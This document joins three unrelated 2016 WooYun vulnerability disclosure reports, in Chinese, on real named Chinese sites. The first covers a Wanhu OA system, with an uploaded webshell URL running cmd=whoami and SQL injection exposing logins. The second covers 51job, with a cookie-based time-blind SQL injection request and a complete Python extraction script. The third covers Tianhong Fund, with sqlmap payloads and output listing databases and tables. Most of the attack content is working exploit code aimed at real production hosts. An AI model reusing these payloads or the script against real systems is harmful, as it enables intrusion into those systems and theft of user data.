漏洞详情披露状态： 2016-05-08： 细节已通知厂商并且等待厂商处理中2016-05-10： 厂商已经确认，细节仅向厂商公开2016-05-20： 细节向核心白帽子及相关领域专家公开2016-05-30： 细节向普通白帽子公开2016-06-09： 细节向实习白帽子公开2016-06-24： 细节向公众公开简要描述： 详细说明：http://oa.my089.cn:7001/defaultroot/Logon!logon.action参考： WooYun: 万户OA多个漏洞打包(任意文件上传.XXE.SQL注射) 上传文件成功：http://oa.my089.cn:7001/defaultroot/upload/test/999999/999999.jspx?cmd=whoami任意命令执行了：威胁内网安全：SQL注入：将数据包保存为txt，上sqlmap可获取用户的登陆信息，随便get一个试试可查看邮件，包含敏感信息：不深入了。漏洞证明： 修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：低漏洞Rank：5确认时间：2016-05-10 09:51厂商回复：是内部自动化办公系统的漏洞，已第一时间采取了临时措施并协同厂商修复。不会对红岭用户信息造成任何影响。感谢白帽子！最新状态：暂无

漏洞详情披露状态： 2016-06-10： 细节已通知厂商并且等待厂商处理中2016-06-10： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-06-17： 厂商已经主动忽略漏洞，细节向公众公开简要描述：51job分站存在SQL注入详细说明： code 区域GET /order.html HTTP/1.1 Cookie: ASPSESSIONIDQCCBRQDA=PAAEILKAFGNBCKPECJMAKPMM; readlist=196%2C25%2C294%2C340%2C307; orderlist=-1)%3Bif(ascii(substring(USER,1,1))>103)%20waitfor%20delay%20'0:0:10'%20--%20; Hm_lvt_2fb608bf1ad8b9b8ce2e04b58003184e=1465491620,1465491620,1465491621,1465491621; Hm_lpvt_2fb608bf1ad8b9b8ce2e04b58003184e=1465491621; HMACCOUNT=CE77C9E3D0040FF7 X-Requested-With: XMLHttpRequest Referer: http://research.51job.com/ Host: research.51job.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */*current result is h{{lcode 区域#!/usr/bin/python # coding=utf-8 import httplib,time,string,sys,random,urllib import requests def getPayloadCookie(i,payload): x = "ASPSESSIONIDQCCBRQDA=PAAEILKAFGNBCKPECJMAKPMM; readlist=196%2C25%2C294%2C340%2C307; orderlist=-1)%3Bif(ascii(substring(DB_NAME(),"+str(i)+",1))>"+str(ord(payload))+")%20waitfor%20delay%20'0:0:10'%20--%20; Hm_lvt_2fb608bf1ad8b9b8ce2e04b58003184e=1465491620,1465491620,1465491621,1465491621; Hm_lpvt_2fb608bf1ad8b9b8ce2e04b58003184e=1465491621; HMACCOUNT=CE77C9E3D0040FF7" headers = { 'Host': 'research.51job.com', 'Accept': '*/*', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36', 'Accept-Encoding': 'gzip, deflate, sdch', 'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6,ja;q=0.4', 'X-Requested-With': 'XMLHttpRequest', 'Referer': 'http://research.51job.com/', 'Connection': 'Keep-alive', 'Cookie': x } return headers def exploit(): res = '' url = 'http://research.51job.com/order.html' payloads = ['@','_','.']+ list(string.ascii_lowercase)+list(string.ascii_uppercase) +[str(i) for i in range(10) ] payloads = sorted(payloads,reverse=True) for i in range(1,30,1): for payload in payloads: try: headers = getPayloadCookie(i,payload) response = requests.request(method='GET',url=url,headers=headers, timeout=3) print chr(ord(payload)+1), sys.stdout.flush() except Exception,e: res += chr(ord(payload)+1) print "\ncurrent result is",res break print res if __name__=='__main__': exploit() #getPayloadCookie(2,'a') 漏洞证明： 修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-06-17 11:00厂商回复： 漏洞Rank：15 (WooYun评价)最新状态：暂无

漏洞详情披露状态： 2016-06-20： 细节已通知厂商并且等待厂商处理中2016-06-21： 厂商已经确认，细节仅向厂商公开2016-06-21： 厂商已经修复漏洞并主动公开，细节向公众公开简要描述：rt 给个高分吧.详细说明：http://www.thfund.com.cn/天弘基金主站 http://www.thfund.com.cn//thfund/fundlist/search/api/?word=eword参数存在注入code 区域GET parameter 'word' is vulnerable. Do you want to keep testing the others (if a ny)? [y/N] y sqlmap identified the following injection point(s) with a total of 277 HTTP(s) r equests: --- Parameter: word (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: word=e%' AND 4468=4468 AND '%'=' Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SLEEP) Payload: word=e%' AND (SELECT * FROM (SELECT(SLEEP(5)))scvx) AND '%'=' --- [08:07:03] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.6.20 back-end DBMS: MySQL 5.0.12code 区域current user: '[email protected]/* */\x1f\x08'漏洞证明： code 区域available databases [4]: [*] information_schema [*] mysql [*] performance_schema [*] thwebcode 区域[08:18:46] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.6.20 back-end DBMS: MySQL 5.0.12 [08:18:46] [INFO] fetching tables for database: 'thweb' [08:18:46] [INFO] fetching number of tables for database 'thweb' [08:18:46] [WARNING] running in a single-thread mode. Please consider usage of o ption '--threads' for faster data retrieval [08:18:46] [INFO] retrieved: 284 [08:18:54] [INFO] retrieved: a_content_body [08:20:04] [INFO] retrieved: a_content_category [08:20:54] [INFO] retrieved: a_w_content [08:21:46] [INFO] retrieved: a_w_content_1 [08:22:07] [INFO] retrieved: aa_channel_category [08:23:29] [INFO] retrieved: aa_fundday [08:24:13] [INFO] retrieved: accesslog [08:25:00] [INFO] retrieved: actions [08:25:27] [INFO] retrieved: aliyunoss_file [08:26:35] [INFO] retrieved: authmap [08:27:07] [INFO] retrieved: batch [08:27:36] [INFO] retrieved: b表太多了 ，就不跑了 仅证明危害修复方案：参数过滤版权声明：转载请注明来源 丶n@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：12确认时间：2016-06-21 10:10厂商回复：谢谢您的提醒，我们会重视并解决最新状态：2016-06-21：已修复。